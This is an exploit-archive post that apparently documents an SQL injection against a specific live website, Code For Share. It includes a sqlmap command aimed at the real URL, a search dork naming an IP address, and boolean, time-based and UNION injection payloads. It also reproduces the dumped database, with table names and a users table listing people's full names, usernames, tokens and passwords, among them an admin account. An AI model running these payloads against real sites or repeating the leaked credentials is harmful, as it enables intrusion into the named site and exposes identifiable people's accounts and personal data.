Code For Share | SQL Injection Vulnerability

2021.10.17

Coder Hunter (DE)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: ip:54.162.128.250 .php?id=

# Exploit Title: Code For Share | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://c4s.khacdatdo.dev/edit.php?id=33" --dbs --batch
---------------------------------------------------------------------------------------------------
.dev Developer / Software
Code For Share
https://c4s.khacdatdo.dev/edit.php?id=33
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=136 AND 3415=3415
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=136 AND (SELECT 2301 FROM (SELECT(SLEEP(5)))MWrG)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=136 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x514a7842596c6b48737771584e474d756864455053446a54765843454d6b6b6441654351776e6965,0x717a6b6a71),NULL,NULL-- -
---
database management system users [1]:
[+] 'i4b3whw47kx5zgbc'@'%'
the back-end DBMS is MySQL
web application technology: PHP, Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[+] an1g279qniutsqwr
[+] information_schema
Database: an1g279qniutsqwr
[8 tables]
+---------------+
| discord-bot |
| chatbot |
| thcs2_code |
| thcs2_log |
| thcs2_report |
| thcs2_txtcode |
| thcs2_users |
| thcs2_view |
+---------------+
Database: an1g279qniutsqwr
Table: thcs2_users
[8 entries]
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+
| id | email | token | birthday | fullname | password | typeuser | username |
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+
| uFzEQ5U90fN30mODLIDeu3vF2IGnd933d6d084280054df6349e05ac15e2a3c | 1 | admin | Đỗ Khắc Đạt | Datdongket@123 | admin | <blank> | <blank> |
| member | 2 | <blank> | Vũ Đình Công | congvu | congvu | <blank> | <blank> |
| member | 3 | <blank> | Phạm Anh Hiếu | hieupham | hieupham | <blank> | <blank> |
| L67MNsJ22s2t3Deu0vXnU1NnwZgOdCaa661568aac0790dcab888d9cba85ad4 | 4 | diepnguyen | Nguyễn Thế Điệp | diepnguyen | member | <blank> | <blank> |
| 8L50OlZJjjWA2gzQlwsCnJmhgGnHmk8691fd3a1e02d55dd75dc1d4a0a44b32 | 5 | haunguyen | Nguyễn Văn Hậu | haunguyen | member | <blank> | <blank> |
| member | 6 | <blank> | Tô Tiến Dũng | dungto | dungto | <blank> | <blank> |
| member | 7 | <blank> | Nguyễn Huy Hoàng | hoangnguyen | hoangnguyen | <blank> | <blank> |
| member | 8 | <blank> | Bùi Quang Huy | huybui | huybui | <blank> | <blank> |
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Code For Share | SQL Injection Vulnerability

Dork: ip:54.162.128.250 .php?id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.